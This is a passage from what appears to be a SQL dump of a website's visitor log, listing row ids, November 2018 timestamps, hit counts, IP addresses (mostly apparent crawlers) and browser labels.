9','chrome'),(339736,1543017453,1,1,0,0,'66.249.65.124','chrome'),(339737,1543017579,2,2,0,0,'54.36.149.12','other'),(339738,1543017594,1,1,0,0,'46.229.168.149','other'),(339739,1543017801,1,1,0,0,'40.77.167.175','other'),(339740,1543018000,1,1,0,0,'54.36.149.55','other'),(339741,1543018228,1,0,1,0,'66.249.65.106',''),(339742,1543018637,1,1,0,0,'66.249.65.124','chrome'),(339743,1543018691,1,1,0,0,'66.249.65.126','chrome'),(339744,1543018719,1,1,0,0,'54.36.149.37','other'),(339745,1543018753,1,1,0,0,'95.163.255.195','other'),(339746,1543018755,1,1,0,0,'95.163.255.186','other'),(339747,1543018763,1,1,0,0,'54.36.148.161','other'),(339748,1543018827,1,1,0,0,'54.36.148.11','other'),(339749,1543018994,1,1,0,0,'54.36.148.28','other'),(339750,1543019040,1,1,0,0,'66.249.65.122','chrome'),(339751,1543019232,1,1,0,0,'54.36.148.251','other'),(339752,1543019271,1,1,0,0,'54.36.148.137','other'),(339753,1543019402,1,1,0,0,'40.77.167.175','other'),(339754,1543019584,1,1,0,0,'54.36.149.16','other'),(339755,1543019942,1,1,0,0,'66.249.65.121','chrome'),(339756,1543019951,1,1,0,0,'66.249.65.104','chrome'),(339757,1543020055,1,1,0,0,'54.36.149.38','other'),(339758,1543020260,1,1,0,0,'54.36.148.187','other'),(339759,1543020339,1,1,0,0,'40.77.167.162','other'),(339760,1543020423,2,2,0,0,'54.36.148.106','other'),(339761,1543020506,1,1,0,0,'95.163.255.161','other'),(339762,1543020509,1,1,0,0,'95.163.255.158','other'),(339763,1543020706,1,1,0,0,'95.163.255.154','other'),(339764,1543020761,1,1,0,0,'54.36.148.207','other'),(339765,1543020828,2,2,0,0,'66.249.65.122','chrome'),(339766,1543020868,1,1,0,0,'54.36.148.211','other'),(339767,1543021189,28,28,0,0,'144.76.119.201','other'),(339768,1543021241,1,1,0,0,'141.8.142.103','other'),(339769,1543021296,1,1,0,0,'46.229.168.135','other'),(339770,1543021298,1,1,0,0,'46.229.168.150','other'),(339771,1543021441,8,8,0,0,'178.154.244.29','other'),(339772,1543021495,1,1,0,0,'54.36.148.186','other'),(339773,1543021519,1,1,0,0,'66.249.65.126','chrome'),(339774,1543021579,1,1,0,0,'66.249.65.124','chrome'),(339775,1543021681,1,1,0,0,'54.36.148.94','other'),(339776,1543021779,1,1,0,0,'54.36.148.247','other'),(339777,1543022122,1,1,0,0,'54.36.149.2','other'),(339778,1543022134,3,3,0,0,'178.154.244.11','other'),(339779,1543022198,1,1,0,0,'54.36.149.73','other'),(339780,1543022310,1,1,0,0,'66.249.65.108','chrome'),(339781,1543022328,2,2,0,0,'5.45.207.79','other'),(339782,1543022387,4,4,0,0,'178.154.244.29','other'),(339783,1543022599,1,1,0,0,'66.249.65.106','chrome'),(339784,1543022654,1,1,0,0,'46.229.168.152','other'),(339785,1543022656,1,1,0,0,'46.229.168.153','other'),(339786,1543022755,1,1,0,0,'54.36.148.35','other'),(339787,1543022808,1,1,0,0,'54.36.148.168','other'),(339788,1543022903,1,1,0,0,'54.36.148.123','other'),(339789,1543022986,2,2,0,0,'204.12.226.26','other'),(339790,1543023052,1,1,0,0,'54.36.149.49','other'),(339791,1543023258,1,1,0,0,'95.163.255.95','other'),(339792,1543023261,1,1,0,0,'95.163.255.97','other'),(339793,1543023347,1,1,0,0,'54.36.148.139','other'),(339794,1543023366,1,1,0,0,'54.36.148.76','other'),(339795,1543023458,1,1,0,0,'54.36.148.42','other'),(339796,1543023503,1,1,0,0,'54.36.148.29','other'),(339797,1543023511,1,1,0,0,'54.36.148.25','other'),(339798,1543023608,1,1,0,0,'54.36.148.137','other'),(339799,1543023609,1,1,0,0,'54.36.148.215','other'),(339800,1543023618,1,1,0,0,'54.36.149.16','other'),(339801,1543023689,1,1,0,0,'66.249.65.108','chrome'),(339802,1543023755,3,3,0,0,'178.154.244.29','other'),(339803,1543023761,1,1,0,0,'54.36.148.57','other'),(339804,1543023858,1,1,0,0,'54.36.148.69','other'),(339805,1543023968,1,1,0,0,'40.77.167.162','other'),(339806,1543023981,1,1,0,0,'95.108.213.4','other'),(339807,1543024049,1,1,0,0,'157.55.39.252','other'),(339808,1543024148,1,1,0,0,'54.36.148.28','other'),(339809,1543024224,1,1,0,0,'54.36.148.51','other'),(339810,1543024236,1,1,0,0,'66.249.65.103','chrome'),(339811,1543024420,1,1,0,0,'54.36.148.213','other'),(339812,1543024691,1,1,0,0,'54.36.148.159','other'),(339813,1543024715,2,2,0,0,'54.188.115.242','chrome'),(339814,1543024922,1,1,0,0,'54.36.148.67','other'),(339815,1543024945,1,1,0,0,'40.77.167.162','other'),(339816,1543024955,1,1,0,0,'54.36.148.94','other'),(339817,1543024978,2,2,0,0,'54.36.149.7','other'),(339818,1543025054,1,1,0,0,'54.36.149.89','other'),(339819,1543025272,1,1,0,0,'54.36.148.174','other'),(339820,1543025417,1,1,0,0,'54.36.148.128','other'),(339821,1543025563,1,1,0,0,'54.36.148.240','other'),(339822,1543025598,1,1,0,0,'54.36.149.23','other'),(339823,1543025631,1,1,0,0,'54.36.149.9','other'),(339824,1543025657,1,1,0,0,'54.36.148.50','other'),(339825,1543025693,1,1,0,0,'8.29.198.27','other'),(339826,1543025810,1,1,0,0,'154.16.138.18','other'),(339827,1543026246,1,1,0,0,'46.229.168.132','other'),(339828,1543026250,1,1,0,0,'46.229.168.142','other'),(339829,1543026279,1,1,0,0,'54.36.148.254','other'),(339830,1543026359,1,1,0,0,'54.36.148.52','other'),(339831,1543026615,1,1,0,0,'54.36.148.28','other'),(339832,1543026720,1,1,0,0,'40.77.167.162','other'),(339833,1543027061,1,1,0,0,'54.36.148.222','other'),(339834,1543027162,1,1,0,0,'157.55.39.252','other'),(339835,1543027179,1,1,0,0,'8.29.198.25','other'),(339836,1543027374,1,1,0,0,'54.36.148.93','other'),(339837,1543027387,1,1,0,0,'95.28.229.72','msie'),(339838,1543027439,1,1,0,0,'54.36.148.10','other'),(339839,1543027493,1,1,0,0,'54.36.148.206','other'),(339840,1543027635,1,1,0,0,'46.229.168.144','other'),(339841,1543027637,1,1,0,0,'46.229.168.153','other'),(339842,1543028009,1,1,0,0,'8.29.198.26','other'),(339843,1543028069,2,2,0,0,'54.36.149.7','other'),(339844,1543028429,1,1,0,0,'40.77.167.162','other'),(339845,1543028628,1,1,0,0,'46.229.168.149','other'),(339846,1543028630,1,1,0,0,'46.229.168.146','other'),(339847,1543029435,1,1,0,0,'54.36.149.96','other'),(339848,1543029520,1,1,0,0,'54.36.148.189','other'),(339849,1543029911,1,1,0,0,'54.36.148.90','other'),(339850,1543030310,1,1,0,0,'54.36.148.139','other'),(339851,1543030459,1,1,0,0,'54.36.148.15','other'),(339852,1543030526,1,1,0,0,'54.36.149.14','other'),(339853,1543030699,1,1,0,0,'46.229.168.143','other'),(339854,1543030906,1,1,0,0,'54.36.148.68','other'),(339855,1543031122,1,1,0,0,'54.36.148.220','other'),(339856,1543031259,1,1,0,0,'54.36.148.133','other'),(339857,1543031568,1,1,0,0,'54.36.148.67','other'),(339858,1543031605,1,1,0,0,'54.36.148.153','other'),(339859,1543031734,1,1,0,0,'54.36.148.175','other'),(339860,1543031854,1,1,0,0,'54.36.148.97','other'),(339861,1543031928,1,1,0,0,'54.36.148.158','other'),(339862,1543032100,1,1,0,0,'54.36.148.217','other'),(339863,1543032116,1,1,0,0,'54.36.148.92','other'),(339864,1543032182,1,1,0,0,'54.36.148.41','other'),(339865,1543032470,1,1,0,0,'54.36.149.63','other'),(339866,1543032685,1,1,0,0,'46.229.168.133','other'),(339867,1543032687,1,1,0,0,'46.229.168.147','other'),(339868,1543032718,1,1,0,0,'54.36.149.7','other'),(339869,1543033261,1,1,0,0,'178.154.244.29','other'),(339870,1543033282,1,1,0,0,'54.36.149.74','other'),(339871,1543033504,1,1,0,0,'54.36.148.101','other'),(339872,1543033682,1,1,0,0,'46.229.168.140','other'),(339873,1543033862,1,1,0,0,'66.249.65.122','chrome'),(339874,1543034099,1,1,0,0,'95.216.2.253','other'),(339875,1543034164,4,4,0,0,'91.137.18.4','other'),(339876,1543034311,1,1,0,0,'66.249.65.104','chrome'),(339877,1543034559,1,1,0,0,'40.77.167.85','other'),(339878,1543035089,1,1,0,0,'54.36.148.62','other'),(339879,1543035149,1,1,0,0,'54.36.149.47','other'),(339880,1543035169,1,1,0,0,'46.229.168.146','other'),(339881,1543035324,1,1,0,0,'54.36.148.175','other'),(339882,1543035400,2,2,0,0,'95.213.141.126','opera'),(339883,1543035526,1,1,0,0,'40.77.167.162','other'),(339884,1543035613,1,1,0,0,'54.36.148.104','other'),(339885,1543035642,1,1,0,0,'54.36.148.118','other'),(339886,1543035656,1,1,0,0,'54.36.148.59','other'),(339887,1543035947,1,1,0,0,'54.36.149.90','other'),(339888,1543035952,1,1,0,0,'54.36.148.173','other'),(339889,1543036159,1,1,0,0,'66.249.65.122','chrome'),(339890,1543036274,1,1,0,0,'54.36.148.131','other'),(339891,1543036420,1,1,0,0,'54.36.149.31','other'),(339892,1543036499,1,1,0,0,'66.249.65.105','chrome'),(339893,1543036500,1,1,0,0,'66.249.65.124','chrome'),(339894,1543036507,1,1,0,0,'66.249.65.108','chrome'),(339895,1543036518,1,1,0,0,'54.36.148.159','other'),(339896,1543036527,1,1,0,0,'8.29.198.25','other'),(339897,1543036838,1,1,0,0,'54.36.149.96','other'),(339898,1543036948,1,1,0,0,'46.229.168.136','other'),(339899,1543037024,1,1,0,0,'178.154.244.11','other'),(339902,1543037025,1,1,0,0,'178.154.244.29','other'),(339903,1543037026,1,1,0,0,'54.36.148.172','other'),(339904,1543037084,1,1,0,0,'40.77.167.222','other'),(339905,1543037182,1,1,0,0,'54.36.149.61','other'),(339906,1543037293,1,1,0,0,'66.249.65.104','chrome'),(339907,1543037411,1,1,0,0,'66.249.65.126','chrome'),(339908,1543037522,1,1,0,0,'54.36.149.50','other'),(339909,1543037583,1,1,0,0,'54.36.149.16','other'),(339910,1543037873,1,1,0,0,'54.36.148.251','other'),(339911,1543037945,1,1,0,0,'54.36.149.101','other'),(339912,1543038012,1,1,0,0,'8.29.198.26','other'),(339913,1543038183,1,1,0,0,'54.36.148.183','other'),(339914,1543038299,1,1,0,0,'5.45.207.19','other'),(339915,1543038317,1,1,0,0,'5.45.207.79','other'),(339916,1543038377,2,2,0,0,'40.77.167.85','other'),(339917,1543038393,1,1,0,0,'54.36.149.102','other'),(339918,1543038418,1,1,0,0,'54.36.148.197','other'),(339919,1543038493,3,3,0,0,'178.154.244.11','other'),(339920,1543038575,1,1,0,0,'95.108.213.4','other'),(339921,1543038720,3,3,0,0,'178.154.244.29','other'),(339922,1543038838,1,1,0,0,'8.29.198.27','other'),(339923,1543038846,1,1,0,0,'54.36.148.50','other'),(339924,1543039011,1,1,0,0,'54.36.148.12','other'),(339925,1543039081,1,1,0,0,'66.249.65.122','chrome'),(339926,1543039123,1,1,0,0,'46.229.168.138','other'),(339927,1543039125,1,1,0,0,'46.229.168.129','other'),(339928,1543039175,2,2,0,0,'66.249.65.124','chrome'),(339929,1543039256,1,1,0,0,'66.249.65.108','chrome'),(339930,1543039435,1,1,0,0,'54.36.148.167','other'),(339931,1543039723,2,2,0,0,'91.196.178.130','firefox'),(339932,1543040134,1,1,0,0,'54.36.148.173','other'),(339933,1543040211,1,1,0,0,'66.249.65.122','chrome'),(339934,1543040212,1,1,0,0,'157.55.39.252','other'),(339935,1543040236,1,1,0,0,'54.36.148.206','other'),(339936,1543040403,1,1,0,0,'54.36.149.104','other'),(339937,1543040883,1,1,0,0,'54.36.148.130','other'),(339938,1543040922,1,1,0,0,'180.76.15.19','other'),(339939,1543040923,1,1,0,0,'180.76.15.22','other'),(339940,1543040937,1,1,0,0,'54.36.148.84','other'),(339941,1543041095,1,1,0,0,'54.36.148.150','other'),(339942,1543041341,1,1,0,0,'54.36.149.43','other'),(339943,1543041357,1,1,0,0,'54.36.148.163','other'),(339944,1543041462,1,1,0,0,'40.77.167.85','other'),(339945,1543041481,1,1,0,0,'54.36.149.0','other'),(339946,1543041536,1,1,0,0,'54.36.148.237','other'),(339947,1543041643,1,1,0,0,'54.36.149.90','other'),(339948,1543041986,1,0,1,0,'66.249.65.99',''),(339949,1543041987,1,0,1,0,'66.249.65.122',''),(339950,1543042149,1,1,0,0,'46.229.168.141','other'),(339951,1543042155,1,0,1,0,'66.249.65.125',''),(339952,1543042156,1,0,1,0,'66.249.65.108',''),(339953,1543042354,1,1,0,0,'54.36.148.169','other'),(339954,1543042373,1,1,0,0,'54.36.148.227','other'),(339955,1543042387,1,1,0,0,'54.36.148.167','other'),(339956,1543042417,1,1,0,0,'54.36.148.92','other'),(339957,1543042511,1,1,0,0,'54.36.148.185','other'),(339958,1543042524,1,1,0,0,'54.36.148.41','other'),(339959,1543042594,1,1,0,0,'54.36.148.98','other'),(339960,1543042605,1,1,0,0,'54.36.148.126','other'),(339961,1543042759,2,2,0,0,'66.249.65.104','chrome'),(339962,1543042871,1,1,0,0,'54.36.149.60','other'),(339963,1543042922,1,1,0,0,'180.76.15.150','other'),(339964,1543042946,1,1,0,0,'54.36.148.243','other'),(339965,1543043028,1,1,0,0,'54.36.148.97','other'),(339966,1543043040,1,1,0,0,'54.36.148.52','other'),(339967,1543043118,1,1,0,0,'40.77.167.162','other'),(339968,1543043338,1,1,0,0,'54.36.148.179','other'),(339969,1543043679,1,1,0,0,'157.55.39.252','other'),(339970,1543043769,1,1,0,0,'66.249.65.106','chrome'),(339971,1543043849,1,1,0,0,'54.36.148.35','other'),(339972,1543044057,2,2,0,0,'66.249.65.99','chrome'),(339973,1543044058,1,1,0,0,'66.249.65.126','chrome'),(339974,1543044156,1,1,0,0,'54.36.148.139','other'),(339975,1543044193,1,1,0,0,'54.36.149.33','other'),(339976,1543044196,1,1,0,0,'54.36.148.150','other'),(339977,1543044324,1,1,0,0,'66.249.65.121','chrome'),(339978,1543044325,1,1,0,0,'66.249.65.104','chrome'),(339979,1543044507,1,1,0,0,'40.77.167.85','other'),(339980,1543044528,1,1,0,0,'54.36.148.34','other'),(339981,1543044640,1,1,0,0,'54.36.149.43','other'),(339982,1543044790,1,1,0,0,'46.229.168.139','other'),(339983,1543044803,1,1,0,0,'46.229.168.148','other'),(339984,1543044881,4,4,0,0,'66.249.65.122','chrome'),(339985,1543044989,1,1,0,0,'54.36.148.190','other'),(339986,1543044990,1,1,0,0,'54.36.148.210','other'),(339987,1543045109,1,1,0,0,'54.36.148.39','other'),(339988,1543045398,1,1,0,0,'66.249.65.126','chrome'),(339989,1543045413,3,3,0,0,'66.249.65.99','chrome'),(339990,1543045468,2,2,0,0,'66.249.65.121','chrome'),(339991,1543045469,2,2,0,0,'66.249.65.108','chrome'),(339992,1543045724,1,1,0,0,'54.36.149.75','other'),(339993,1543045738,3,3,0,0,'66.249.65.124','chrome'),(339994,1543045829,1,1,0,0,'46.229.168.136','other'),(339995,1543045955,1,1,0,0,'54.36.148.76','other'),(339996,1543045982,1,1,0,0,'54.36.148.122','other'),(339997,1543046043,1,1,0,0,'54.36.148.216','other'),(339998,1543046178,1,1,0,0,'54.36.148.140','other'),(339999,1543046199,1,1,0,0,'95.163.255.99','other'),(340000,1543046202,1,1,0,0,'95.163.255.96','other'),(340001,1543046203,1,1,0,0,'54.36.148.129','other'),(340002,1543046224,1,1,0,0,'54.36.148.123','other'),(340003,1543046226,1,1,0,0,'54.36.148.131','other'),(340004,1543046304,1,1,0,0,'66.249.65.126','chrome'),(340005,1543046369,1,1,0,0,'66.249.65.123','chrome'),(340006,1543046371,2,2,0,0,'66.249.65.108','chrome'),(340007,1543046391,1,1,0,0,'54.36.149.50','other'),(340008,1543046392,1,1,0,0,'66.249.65.99','chrome'),(340009,1543046428,3,3,0,0,'66.249.65.122','chrome'),(340010,1543046454,1,1,0,0,'54.36.148.102','other'),(340011,1543046455,1,1,0,0,'40.77.167.175','other'),(340012,1543046507,1,1,0,0,'54.36.148.189','other'),(340013,1543046518,1,1,0,0,'54.36.149.52','other'),(340014,1543046680,1,1,0,0,'54.36.149.24','other'),(340015,1543046740,1,1,0,0,'66.249.65.103','chrome'),(340016,1543046958,1,1,0,0,'54.36.148.49','other'),(340017,1543047081,1,1,0,0,'66.249.65.105','chrome'),(340018,1543047170,1,1,0,0,'46.229.168.154','other'),(340019,1543047172,2,2,0,0,'134.249.147.220','chrome'),(340020,1543047355,1,1,0,0,'8.29.198.26','other'),(340021,1543047395,1,1,0,0,'54.36.148.249','other'),(340022,1543047417,1,1,0,0,'54.36.148.40','other'),(340023,1543047438,2,2,0,0,'91.196.178.93','firefox'),(340024,1543047599,1,1,0,0,'107.21.1.8','other'),(340025,1543047602,1,1,0,0,'54.208.102.37','other'),(340026,1543047670,1,1,0,0,'54.36.148.33','other'),(340027,1543047795,1,1,0,0,'46.229.168.130','other'),(340028,1543047922,1,1,0,0,'54.36.149.58','other'),(340029,1543048501,1,1,0,0,'66.249.65.126','chrome'),(340030,1543048708,1,1,0,0,'54.36.148.94','other'),(340031,1543048735,1,1,0,0,'178.154.244.11','other'),(340032,1543048833,1,1,0,0,'54.36.148.183','other'),(340033,1543048848,1,1,0,0,'8.29.198.25','other'),(340034,1543049193,2,2,0,0,'66.249.65.124','chrome'),(340035,1543049207,1,1,0,0,'46.229.168.132','other'),(340036,1543049674,1,1,0,0,'8.29.198.26','other'),(340037,1543049737,1,1,0,0,'54.36.148.168','other'),(340038,1543049859,1,1,0,0,'54.36.149.74','other'),(340039,1543050005,1,1,0,0,'46.211.108.148','chrome'),(340040,1543050378,1,1,0,0,'66.249.65.126','chrome'),(340041,1543050497,1,1,0,0,'66.249.65.124','chrome'),(340042,1543050545,1,1,0,0,'194.28.4.3','firefox'),(340043,1543050745,1,1,0,0,'54.36.149.91','other'),(340044,1543050918,1,1,0,0,'54.36.148.235','other'),(340045,1543050920,1,1,0,0,'54.36.148.236','other'),(340046,1543050950,2,2,0,0,'54.36.148.183','other'),(340047,1543051516,1,1,0,0,'54.36.148.220','other'),(340048,1543051533,1,1,0,0,'46.229.168.136','other'),(340049,1543051734,1,1,0,0,'66.249.65.125','chrome'),(340050,1543051735,1,1,0,0,'66.249.65.106','chrome'),(340051,1543051928,1,1,0,0,'54.36.149.87','other'),(340052,1543051937,1,1,0,0,'54.36.148.237','other'),(340053,1543052412,1,1,0,0,'40.77.167.85','other'),(340054,1543052498,1,1,0,0,'66.249.65.122','chrome'),(340055,1543052516,2,2,0,0,'66.249.65.124','chrome'),(340056,1543052734,2,2,0,0,'54.36.148.66','other'),(340057,1543052909,1,1,0,0,'40.77.167.195','other'),(340058,1543053050,1,1,0,0,'54.36.148.121','other'),(340059,1543053067,1,1,0,0,'54.36.148.90','other'),(340060,1543053120,1,1,0,0,'141.8.142.144','other'),(340061,1543053121,1,1,0,0,'141.8.142.38','other'),(340064,1543053255,1,1,0,0,'54.36.149.14','other'),(340065,1543053409,1,1,0,0,'54.36.148.112','other'),(340066,1543053458,1,1,0,0,'54.36.148.109','other'),(340067,1543053617,1,1,0,0,'157.55.39.252','other'),(340068,1543053628,1,1,0,0,'54.36.149.71','other'),(340069,1543053715,1,1,0,0,'54.36.148.135','other'),(340070,1543053741,1,1,0,0,'37.9.113.148','other'),(340071,1543053837,1,1,0,0,'54.36.149.88','other'),(340072,1543053861,1,1,0,0,'178.154.171.24','other'),(340073,1543053911,1,1,0,0,'95.108.181.75','other'),(340074,1543053958,1,1,0,0,'141.8.132.16','other'),(340075,1543053961,1,1,0,0,'5.45.207.19','other'),(340076,1543054110,1,1,0,0,'87.250.224.118','other'),(340077,1543054113,1,1,0,0,'37.9.113.103','other'),(340078,1543054164,1,1,0,0,'54.36.149.65','other'),(340079,1543054166,1,1,0,0,'54.36.148.211','other'),(340080,1543054201,1,1,0,0,'141.8.142.144','other'),(340081,1543054224,1,1,0,0,'66.249.65.105','chrome'),(340082,1543054225,1,1,0,0,'66.249.65.126','chrome'),(340083,1543054309,1,1,0,0,'95.108.213.4','other'),(340084,1543054324,1,1,0,0,'178.154.200.48','other'),(340085,1543054356,6,6,0,0,'178.154.244.29','other'),(340086,1543054519,2,2,0,0,'178.154.244.11','other'),(340087,1543054555,1,1,0,0,'178.154.244.65','other'),(340088,1543054576,1,1,0,0,'40.77.167.175','other'),(340089,1543054590,3,3,0,0,'5.45.207.79','other'),(340090,1543054640,1,1,0,0,'46.229.168.148','other'),(340091,1543054712,1,1,0,0,'54.36.148.200','other'),(340092,1543055308,1,1,0,0,'95.108.181.54','other'),(340093,1543055394,1,1,0,0,'54.36.148.16','other'),(340094,1543055406,1,1,0,0,'5.45.207.19','other'),(340095,1543055450,3,3,0,0,'178.154.244.29','other'),(340096,1543055456,1,1,0,0,'54.36.149.8','other'),(340097,1543055516,1,1,0,0,'54.36.148.13','other'),(340098,1543055574,2,2,0,0,'66.249.65.124','chrome'),(340099,1543055584,1,1,0,0,'66.249.65.122','chrome'),(340100,1543055788,1,1,0,0,'46.229.168.152','other'),(340101,1543055790,1,1,0,0,'46.229.168.130','other'),(340102,1543055948,1,1,0,0,'178.154.244.11','other'),(340103,1543056092,1,1,0,0,'54.36.148.115','other'),(340104,1543056257,1,1,0,0,'54.36.148.113','other'),(340105,1543056516,1,1,0,0,'54.36.148.224','other'),(340106,1543056641,1,1,0,0,'54.36.149.97','other'),(340107,1543056655,1,1,0,0,'91.196.178.58','chrome'),(340108,1543056660,3,3,0,0,'178.154.244.29','other'),(340109,1543056766,1,1,0,0,'54.36.148.212','other'),(340110,1543056944,1,1,0,0,'54.36.149.23','other'),(340111,1543057414,1,1,0,0,'54.36.148.29','other'),(340112,1543058192,1,1,0,0,'8.29.198.27','other'),(340113,1543058317,1,1,0,0,'54.36.148.246','other'),(340114,1543058376,1,1,0,0,'54.36.148.121','other'),(340115,1543058478,1,1,0,0,'54.36.148.74','other'),(340116,1543058519,1,1,0,0,'54.36.148.37','other'),(340117,1543058604,1,1,0,0,'54.36.149.53','other'),(340118,1543058680,1,1,0,0,'46.229.168.138','other'),(340119,1543058682,1,1,0,0,'46.229.168.152','other'),(340120,1543058919,1,1,0,0,'46.229.168.146','other'),(340121,1543058999,1,1,0,0,'54.36.149.73','other'),(340122,1543059505,1,1,0,0,'54.36.148.131','other'),(340123,1543059644,1,1,0,0,'54.36.148.115','other'),(340124,1543059681,1,1,0,0,'8.29.198.25','other'),(340125,1543059737,1,1,0,0,'54.36.148.40','other'),(340126,1543059830,1,1,0,0,'54.36.148.231','other'),(340127,1543059891,1,1,0,0,'54.36.149.44','other'),(340128,1543059902,1,1,0,0,'54.36.148.212','other'),(340129,1543059985,1,1,0,0,'54.36.149.43','other'),(340130,1543060246,1,1,0,0,'66.249.65.126','chrome'),(340131,1543060332,1,1,0,0,'54.36.148.201','other'),(340132,1543060335,1,1,0,0,'178.154.244.29','other'),(340133,1543060383,1,1,0,0,'54.36.148.114','other'),(340134,1543060506,1,1,0,0,'8.29.198.26','other'),(340136,1543060587,1,1,0,0,'54.36.148.54','other'),(340137,1543060591,1,1,0,0,'66.249.65.124','chrome'),(340138,1543060681,1,1,0,0,'46.229.168.136','other'),(340139,1543060841,1,1,0,0,'54.36.148.156','other'),(340140,1543060854,1,1,0,0,'40.77.167.85','other'),(340141,1543061200,1,1,0,0,'46.229.168.142','other'),(340142,1543061236,1,1,0,0,'54.36.148.77','other'),(340143,1543061269,1,1,0,0,'54.36.148.177','other'),(340144,1543061281,1,1,0,0,'66.249.65.126','chrome'),(340145,1543061594,2,2,0,0,'66.249.65.106','chrome'),(340146,1543061939,1,1,0,0,'66.249.65.125','chrome'),(340147,1543062066,1,1,0,0,'54.36.148.65','other'),(340148,1543062173,1,1,0,0,'54.36.148.68','other'),(340149,1543062201,1,1,0,0,'54.36.148.48','other'),(340150,1543062318,3,3,0,0,'66.249.65.124','chrome'),(340151,1543062540,1,1,0,0,'95.163.255.68','other'),(340152,1543062542,1,1,0,0,'95.163.255.67','other'),(340153,1543062622,1,1,0,0,'66.249.65.126','chrome'),(340154,1543062755,1,1,0,0,'54.36.148.62','other'),(340155,1543062817,1,1,0,0,'54.36.148.159','other'),(340156,1543063200,1,1,0,0,'54.36.148.196','other'),(340157,1543063249,1,1,0,0,'95.163.255.97','other'),(340158,1543063251,1,1,0,0,'95.163.255.93','other'),(340159,1543063929,1,1,0,0,'46.229.168.152','other'),(340160,1543063931,1,1,0,0,'46.229.168.132','other'),(340161,1543063964,1,1,0,0,'54.36.148.43','other'),(340162,1543064078,1,1,0,0,'178.92.8.91','firefox'),(340163,1543064101,1,1,0,0,'46.229.168.148','other'),(340164,1543064139,2,2,0,0,'66.249.65.126','chrome'),(340165,1543064167,2,2,0,0,'66.249.65.124','chrome'),(340166,1543064509,1,1,0,0,'54.36.149.72','other'),(340167,1543064534,1,1,0,0,'66.249.65.104','chrome'),(340168,1543064627,2,2,0,0,'54.36.148.228','other'),(340169,1543064791,1,1,0,0,'54.36.149.32','other'),(340170,1543065082,1,1,0,0,'66.249.65.126','chrome'),(340171,1543065198,1,1,0,0,'95.163.255.67','other'),(340172,1543065200,1,1,0,0,'95.163.255.62','other'),(340173,1543065387,1,1,0,0,'46.229.168.138','other'),(340174,1543065874,1,1,0,0,'54.36.149.41','other'),(340175,1543066083,1,1,0,0,'54.36.148.66','other'),(340176,1543066214,1,1,0,0,'54.36.149.53','other'),(340177,1543066297,1,1,0,0,'54.36.149.48','other'),(340178,1543066361,1,1,0,0,'54.36.148.137','other'),(340179,1543066368,1,1,0,0,'54.36.148.157','other'),(340180,1543066446,1,1,0,0,'54.36.148.115','other'),(340181,1543066575,1,1,0,0,'54.36.148.23','other'),(340182,1543066586,1,1,0,0,'54.36.149.47','other'),(340183,1543066590,2,2,0,0,'54.36.149.1','other'),(340184,1543066737,1,1,0,0,'54.36.148.81','other'),(340185,1543066758,1,1,0,0,'54.36.149.73','other'),(340186,1543067239,5,5,0,0,'178.154.244.29','other'),(340187,1543067263,1,1,0,0,'40.77.167.85','other'),(340188,1543067606,1,1,0,0,'54.36.148.103','other'),(340189,1543067612,4,4,0,0,'5.45.207.79','other'),(340190,1543067661,2,2,0,0,'46.211.26.0','chrome'),(340191,1543067732,1,1,0,0,'141.8.142.103','other'),(340192,1543067798,3,3,0,0,'178.154.244.11','other'),(340193,1543067881,1,1,0,0,'46.229.168.132','other'),(340194,1543068212,7,7,0,0,'178.154.244.29','other'),(340195,1543068310,1,1,0,0,'95.163.255.107','other'),(340196,1543068318,1,1,0,0,'95.163.255.102','other'),(340197,1543068326,2,2,0,0,'95.163.255.113','other'),(340198,1543068352,1,1,0,0,'95.163.255.105','other'),(340199,1543068360,1,1,0,0,'95.163.255.106','other'),(340200,1543068409,1,1,0,0,'54.36.148.254','other'),(340201,1543068464,2,2,0,0,'66.249.65.122','chrome'),(340202,1543068493,1,1,0,0,'54.36.149.70','other'),(340203,1543068607,1,1,0,0,'46.229.168.134','other'),(340204,1543068611,1,1,0,0,'46.229.168.143','other'),(340205,1543068794,1,1,0,0,'54.36.148.189','other'),(340206,1543068959,1,1,0,0,'54.36.148.126','other'),(340207,1543069017,1,1,0,0,'8.29.198.27','other'),(340208,1543069201,1,1,0,0,'40.77.167.162','other'),(340209,1543069348,1,1,0,0,'54.36.149.106','other'),(340210,1543069513,1,1,0,0,'87.250.224.65','other'),(340211,1543069557,1,1,0,0,'54.36.148.112','other'),(340212,1543069754,1,1,0,0,'54.36.148.175','other'),(340213,1543069802,1,1,0,0,'66.249.65.104','chrome'),(340214,1543069970,1,1,0,0,'54.36.149.54','other'),(340215,1543070132,1,1,0,0,'54.36.149.50','other'),(340216,1543070185,1,1,0,0,'46.229.168.142','other'),(340217,1543070517,1,1,0,0,'8.29.198.25','other'),(340218,1543070787,1,1,0,0,'46.229.168.146','other'),(340219,1543070836,1,1,0,0,'54.36.148.150','other'),(340220,1543070838,1,1,0,0,'40.77.167.162','other'),(340221,1543071340,1,1,0,0,'8.29.198.26','other'),(340222,1543071697,1,1,0,0,'40.77.167.85','other'),(340223,1543071853,1,1,0,0,'54.36.148.166','other'),(340224,1543072086,3,3,0,0,'178.154.244.11','other'),(340225,1543072091,1,1,0,0,'5.45.207.79','other'),(340226,1543072514,1,1,0,0,'54.36.149.44','other'),(340227,1543072645,2,2,0,0,'91.196.178.130','chrome'),(340228,1543072705,2,2,0,0,'91.209.11.236','other'),(340229,1543072740,1,1,0,0,'54.36.148.38','other'),(340230,1543072801,1,1,0,0,'54.36.148.91','other'),(340231,1543073441,1,1,0,0,'40.77.167.175','other'),(340232,1543073707,1,1,0,0,'54.36.148.44','other'),(340233,1543073771,1,1,0,0,'54.36.148.24','other'),(340234,1543073908,1,1,0,0,'54.36.149.97','other'),(340235,1543073941,1,1,0,0,'66.249.66.155','chrome'),(340236,1543073944,1,1,0,0,'66.249.66.154','chrome'),(340237,1543073967,1,1,0,0,'54.36.148.103','other'),(340238,1543074069,1,1,0,0,'54.36.149.45','other'),(340239,1543074189,1,1,0,0,'46.229.168.135','other'),(340240,1543074192,1,1,0,0,'46.229.168.149','other'),(340241,1543074291,1,1,0,0,'54.36.148.216','other'),(340242,1543074347,1,1,0,0,'54.36.148.139','other'),(340243,1543074360,1,1,0,0,'46.229.168.134','other'),(340244,1543074495,1,1,0,0,'46.229.168.145','other'),(340245,1543074575,1,1,0,0,'95.163.255.95','other'),(340246,1543074578,1,1,0,0,'95.163.255.97','other'),(340247,1543074847,1,1,0,0,'54.36.148.189','other'),(340248,1543075041,1,1,0,0,'54.36.148.120','other'),(340249,1543075087,1,1,0,0,'46.229.168.137','other'),(340250,1543075089,1,1,0,0,'46.229.168.154','other'),(340251,1543075320,1,1,0,0,'54.36.148.158','other'),(340252,1543075385,1,1,0,